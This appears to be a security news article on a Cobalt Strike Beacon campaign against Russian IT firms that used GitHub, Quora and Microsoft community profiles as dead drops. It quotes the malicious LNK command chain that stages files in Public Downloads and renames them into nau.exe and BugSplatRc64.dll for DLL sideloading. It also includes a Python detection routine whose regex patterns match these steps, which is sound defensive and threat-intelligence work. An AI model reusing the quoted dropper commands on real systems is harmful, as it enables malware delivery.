Hackers Delivering Cobalt Strike Beacon Leveraging GitHub and Social Media
A sophisticated cyberattack campaign targeting the Russian IT industry has emerged, demonstrating how threat actors are increasingly leveraging legitimate online platforms to distribute the notorious Cobalt Strike Beacon malware.
The campaign, which peaked during November and December 2024 and continued through April 2025, represents a significant evolution in attack methodology, utilizing popular social media platforms and code repositories as command-and-control infrastructure.
The attackers employed an intricate multi-stage delivery mechanism that begins with spear-phishing emails disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector.
These carefully crafted messages contained malicious RAR archives designed to evade traditional security detection systems.
The campaign’s scope extended beyond Russia, with evidence of malicious activity detected in China, Japan, Malaysia, and Peru, primarily targeting large and medium-sized businesses.
What sets this campaign apart is its innovative use of social media platforms and popular websites as staging grounds for malicious payloads.
Securelist analysts identified that the attackers established fake profiles on GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks to host encoded payload information.
This technique allows the malware to blend seamlessly with legitimate web traffic, making detection significantly more challenging for traditional security solutions.
The attack’s sophistication extends to its technical implementation, employing advanced evasion techniques including DLL hijacking and dynamic API resolution.
The malware specifically targets the legitimate BugSplat crash reporting utility, exploiting it through a technique known as DLL substitution to load malicious code while maintaining the appearance of normal system operations.
Technical Infection Mechanism
The infection chain begins when victims open the malicious RAR archive, which contains a carefully structured directory hierarchy designed to deceive users.
The archive includes legitimate-looking PDF files alongside a malicious LNK file named “Требования.lnk” that serves as the initial execution vector.
Upon execution, the LNK file performs a series of file operations through the following command sequence:
%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads
& start %cd%\Требования
& ren %public%\Downloads\Company.pdf nau.exe
& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll
& %public%\Downloads\nau.exe
This sequence copies the hidden files to the Public Downloads directory, renames the PDF-disguised files to an executable (nau.exe) and a DLL (BugSplatRc64.dll), and launches the primary payload.
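As an added illustration (not code from the Securelist report or from this article), the following Python routine scores process-creation events for the behaviours this LNK chain shows: xcopy /h into %public%\Downloads, ren of .pdf files to .exe or .dll, the BugSplatRc64.dll name, and execution from the Public Downloads folder. The sample events, indicator weights and threshold are constructed for the example.

```python
import re

# Constructed sample process-creation events (Sysmon event 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo F | xcopy /h /y "%cd%\Требования\Требования" %public%\Downloads '
                r'& ren %public%\Downloads\Company.pdf nau.exe '
                r'& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll & %public%\Downloads\nau.exe'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c xcopy /y C:\Users\alice\report.pdf C:\Users\Public\Downloads"},
    {"image": r"C:\Users\Public\Downloads\nau.exe", "cmdline": r"nau.exe"},
]

# One indicator per behaviour in the reported chain; weights are assumptions chosen so that
# a benign copy into Public\Downloads alone stays below the alert threshold.
INDICATORS = {
    "xcopy_hidden":     (re.compile(r"\bxcopy\b[^&]*\s/h\b", re.I), 1),
    "public_downloads": (re.compile(r"%public%\\downloads|\\users\\public\\downloads", re.I), 1),
    "pdf_to_exe":       (re.compile(r"\bren\b\s+\S+\.pdf\s+\S+\.(exe|dll)\b", re.I), 3),
    "bugsplat_dll":     (re.compile(r"bugsplatrc64\.dll", re.I), 3),
    "run_from_public":  (re.compile(r"(^|&\s*)%public%\\downloads\\\S+\.exe", re.I), 2),
}
IMAGE_IN_PUBLIC = re.compile(r"\\users\\public\\downloads\\", re.I)


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return the weighted score and the matched indicator names for one event."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(event["cmdline"])]
    score = sum(INDICATORS[name][1] for name in hits)
    # The final stage runs from Public\Downloads: catch the child process even if the
    # parent cmd.exe command line was not logged.
    if IMAGE_IN_PUBLIC.search(event["image"]):
        hits.append("image_in_public_downloads")
        score += 2
    return score, hits


def find_suspicious(events: list[dict], threshold: int = 4) -> list[tuple[int, list[str]]]:
    """Return (score, hits) for every event at or above the threshold, in input order."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append((score, hits))
    return flagged


if __name__ == "__main__":
    for score, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"score={score} indicators={hits}")
```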
The malware exploits BugSplat’s crash reporting utility by hijacking its required DLL, forcing it to load malicious code instead of legitimate functionality.
The malware then queries social media profiles containing base64-encoded, XOR-encrypted data that reveals additional payload URLs.
Analysis revealed communication with profiles at https://techcommunity.microsoft.com/t5/user/viewprofilepage/user-id/2631 and https://www.quora.com/profile/Marieformach, with the extracted data pointing to GitHub repositories hosting the final Cobalt Strike payload.
This campaign demonstrates the evolving threat landscape where attackers exploit the trust inherent in popular platforms to establish resilient command-and-control infrastructure, highlighting the need for enhanced detection capabilities that can identify malicious activities across legitimate web services.